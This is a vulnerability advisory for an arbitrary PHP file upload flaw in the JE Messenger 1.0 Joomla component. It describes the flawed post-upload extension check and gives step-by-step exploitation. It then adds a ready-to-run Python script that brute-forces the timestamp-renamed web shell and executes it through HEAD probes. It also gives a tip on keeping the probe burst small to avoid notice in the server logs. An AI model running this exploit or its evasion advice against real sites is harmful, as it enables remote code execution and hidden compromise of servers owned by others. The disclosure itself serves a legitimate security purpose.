JE Messenger 1.0 Arbitrary File Upload Vulnerability
Name               JE Messenger
Vendor             http://joomlaextensions.co.in
Versions Affected  1.0
Author             Salvatore Fresta aka Drosophila
Website            http://www.salvatorefresta.net
Contact            salvatorefresta [at] gmail [dot] com
Date               2010-12-09
X. INDEX
I.   ABOUT THE APPLICATION
II.  DESCRIPTION
III. ANALYSIS
IV.  SAMPLE CODE
V.   FIX
I. ABOUT THE APPLICATION
________________________
JE Messenger is a Joomla component.
II. DESCRIPTION
_______________
The extension of an uploaded file is not validated before the file
is written to disk by the native Joomla upload function.
III. ANALYSIS
_____________
Summary:
A) Arbitrary File Upload
A) Arbitrary File Upload
________________________
A logic error in the save function (compose.php) allows a registered
user to upload a file with any extension. The check for a valid file
extension is performed only after the upload, and when the check fails
the file is not removed from the server. This can be exploited to
execute arbitrary PHP code by uploading a PHP file.
The file is renamed during the upload:
$file['name'] = time().'in'.$file['name'];
Example:
Original file name: shell.php
Uploaded file name: 1291907399inshell.php
where 1291907399 is the value returned by the time() function at the
moment the upload was processed.
The file will be uploaded to the following directory:
$dest = JPATH_ROOT.DS.'components/'.$option.'/assets/images/'.$file['name'];
The default destination is:
http://site/path/components/com_jemessenger/assets/images/
IV. SAMPLE CODE
_______________
A) Arbitrary File Upload
1 - Log in to the target Joomla site as a registered user
2 - Go to http://site/path/index.php?option=com_jemessenger&view=compose
3 - Fill in the form with valid values and attach an arbitrary file
    (for example a PHP file)
4 - Request http://site/path/components/com_jemessenger/assets/images/filename
Since filename is time().'in' followed by the original name, note the
time of the upload and try a small bruteforce around it to find the
value returned by the time() function.
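The following is an added example, not code from the original advisory
or from the vendor. It implements step 4: it generates the candidate
names that the renaming rule time().'in'.$name can produce around the
moment of the upload, walking outward from the local timestamp so the
most likely names are tried first, and probes them under the default
destination directory. The base URL, the original file name and the
width of the search window are placeholders; the HTTP probe is passed
in as a callback so the search logic can be exercised offline.

```python
"""Locate the renamed upload of JE Messenger 1.0 (added example).

Assumes the rename rule quoted in the advisory, time() . 'in' . name,
and the default asset directory. Target URL and file name are
hypothetical placeholders.
"""
import time
import urllib.error
import urllib.request
from typing import Callable, Iterator, Optional
from urllib.parse import urljoin

# Default destination directory stated in the advisory.
ASSETS_PATH = "components/com_jemessenger/assets/images/"


def candidate_names(original_name: str, upload_epoch: int,
                    window: int = 30) -> Iterator[str]:
    """Yield renamed file names in the order most likely to match.

    The server calls time() when it handles the request, so the name is
    built from a timestamp close to the local time of the upload. Yield
    the exact local timestamp first, then t+1, t-1, t+2, t-2, ... up to
    `window` seconds on each side to absorb latency and clock skew.
    """
    yield f"{upload_epoch}in{original_name}"
    for delta in range(1, window + 1):
        yield f"{upload_epoch + delta}in{original_name}"
        yield f"{upload_epoch - delta}in{original_name}"


def find_uploaded_file(base_url: str, original_name: str, upload_epoch: int,
                       fetch: Callable[[str], int],
                       window: int = 30) -> Optional[str]:
    """Return the URL of the first candidate `fetch` reports with HTTP 200.

    `fetch(url)` returns an HTTP status code. It is injected so the search
    can be tested offline; a real run passes `http_status` below.
    """
    for name in candidate_names(original_name, upload_epoch, window):
        url = urljoin(base_url, ASSETS_PATH + name)
        if fetch(url) == 200:
            return url
    return None


def http_status(url: str) -> int:
    """Real probe: HEAD the URL and return its status (0 on connection error).

    Note that a HEAD on an uploaded .php file already executes it.
    """
    req = urllib.request.Request(url, method="HEAD")
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as exc:
        return exc.code
    except urllib.error.URLError:
        return 0


if __name__ == "__main__":
    # Hypothetical usage: record int(time.time()) right before submitting
    # the compose form, then search around that value.
    upload_epoch = int(time.time())
    hit = find_uploaded_file("http://site/path/", "shell.php",
                             upload_epoch, http_status)
    print(hit or "not found inside the search window")
```

Keep the window small: every probe of a candidate that exists executes
the uploaded PHP file, and a wide window produces a burst of 404s in the
web server log that is easy to spot.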
V. FIX
______
No fix.